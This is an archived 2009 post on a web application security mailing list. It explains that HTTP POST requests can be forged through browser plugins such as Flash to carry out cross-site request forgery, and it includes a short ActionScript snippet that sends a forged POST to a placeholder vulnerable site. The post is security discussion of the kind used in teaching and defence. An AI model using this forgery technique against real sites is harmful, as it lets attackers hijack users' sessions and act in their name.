WebApp Sec mailing list archives

Re: CSRF through POST


From: YGN Ethical Hacker Group <lists () yehg net>
Date: Sat, 26 Dec 2009 21:55:23 -0800

You can forge HTTP Post using any feasible browser plugins such as
Flash (AS), SilverLight, Java Applet.
Flash is said to be a feasible way to take over victim's sessions via CSRF.


[flash]
var req:LoadVars=new LoadVars();
req.addRequestHeader("Foo","Bar");
req.decode("a=b&c=d");
req.send("http://www.vuln.site/some/page.cgi?p1=v1&p2=v2";,
         "_blank","POST");
[/flash]

http://www.shinedraw.com/data-handling/flash-vs-silverlight-simple-http-post-request/
http://www.securiteam.com/securityreviews/5KP0M1FJ5E.html
http://forums.sun.com/thread.jspa?threadID=645830

-- 
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net



This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now! 
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------


Current thread: